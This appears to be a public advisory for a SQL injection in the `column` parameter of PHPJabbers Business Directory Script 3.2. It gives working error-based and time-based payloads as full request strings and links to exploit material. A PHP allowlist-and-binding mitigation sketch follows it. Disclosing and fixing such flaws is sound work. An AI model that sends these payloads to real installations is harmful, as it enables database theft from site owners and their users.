<pre><code>## Title: Business-Directory-Script-3.2 SQLi<br />## Author: nu11secur1ty<br />## Date: 08/25/2023<br />## Vendor: https://www.phpjabbers.com/<br />## Software: https://www.phpjabbers.com/business-directory-script/#sectionDemo<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The `column` parameter appears to be vulnerable to SQL injection<br />attacks. The payload ' was submitted in the column parameter, and a<br />database error message was returned. You should review the contents of<br />the error message, and the application's handling of other input, to<br />confirm whether a vulnerability is present. Additionally, the payload<br />(select*from(select(sleep(20)))a) was submitted in the column<br />parameter. The application took 20271 milliseconds to respond to the<br />request, compared with 230 milliseconds for the original request,<br />indicating that the injected SQL command caused a time delay. An<br />attacker can steal all information from the database on this<br />application's server!<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: column (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)<br /> Payload: controller=pjAdminListings&action=pjActionGetListing&column=(UPDATEXML(2242,CONCAT(0x2e,0x716a767a71,(SELECT<br />(ELT(2242=2242,1))),0x7178787671),5199))&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)<br /> Payload: controller=pjAdminListings&action=pjActionGetListing&column=(SELECT<br />6261 FROM 
(SELECT(SLEEP(15)))CMYC)&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Business-Directory-Script-Version%3A3.2/SQLi)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/08/business-directory-script-version32-sqli.html)<br /><br />## Time spent:<br />01:35:00<br /></code></pre>
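
Added example, not code from the advisory or from PHPJabbers: a mitigation sketch for the `column` and `direction` request parameters named above, resolving both through allowlists because SQL identifiers cannot be bound as statement parameters. It assumes `column` feeds an ORDER BY clause, which the advisory does not confirm; the table, column names and function names are hypothetical.

```php
<?php
declare(strict_types=1);
// Hypothetical sort keys the UI may send, mapped to fixed SQL identifiers.
const SORT_COLUMNS = [
    'listing_title' => 't1.listing_title',
    'created'       => 't1.created',
];

// Identifiers cannot be bound as placeholders, so `column` and `direction`
// go through allowlists; every other value is cast to int or bound.
function buildListingQuery(array $get): array
{
    // Read a request value as a string; arrays and missing keys become ''.
    $str = fn(string $k): string => is_string($get[$k] ?? null) ? $get[$k] : '';

    // Unknown sort key (including any SQL expression): use the fixed default.
    $orderBy = SORT_COLUMNS[$str('column')] ?? SORT_COLUMNS['created'];
    $dir = in_array(strtoupper($str('direction')), ['ASC', 'DESC'], true)
        ? strtoupper($str('direction')) : 'ASC';
    $rowCount = max(1, min(100, ((int) $str('rowCount')) ?: 10));
    $page = max(1, min(100000, (int) $str('page')));

    $sql = "SELECT t1.id, t1.listing_title FROM listings AS t1
            WHERE t1.listing_title LIKE :keyword
            ORDER BY $orderBy $dir LIMIT :limit OFFSET :offset";
    return [$sql, [
        ':keyword' => '%' . $str('keyword') . '%',
        ':limit'   => $rowCount,
        ':offset'  => ($page - 1) * $rowCount,
    ]];
}

// Execute with bound values; integers are bound as PARAM_INT for LIMIT/OFFSET.
function runListingQuery(PDO $pdo, array $get): array
{
    [$sql, $bind] = buildListingQuery($get);
    $stmt = $pdo->prepare($sql);
    foreach ($bind as $name => $value) {
        $stmt->bindValue($name, $value, is_int($value) ? PDO::PARAM_INT : PDO::PARAM_STR);
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed requests: a normal one, then one whose `column` is not a sort key.
foreach ([
    ['column' => 'listing_title', 'direction' => 'desc', 'page' => '2'],
    ['column' => '(SELECT 1)', 'direction' => 'ASC;', 'rowCount' => '5000'],
] as $get) {
    [$sql, $bind] = buildListingQuery($get);
    echo preg_replace('/\s+/', ' ', $sql), ' | limit=', $bind[':limit'], PHP_EOL;
}
```

Only strings from the two allowlists ever reach the ORDER BY text, so the second request sorts by the default column in ascending order with the row count clamped to 100.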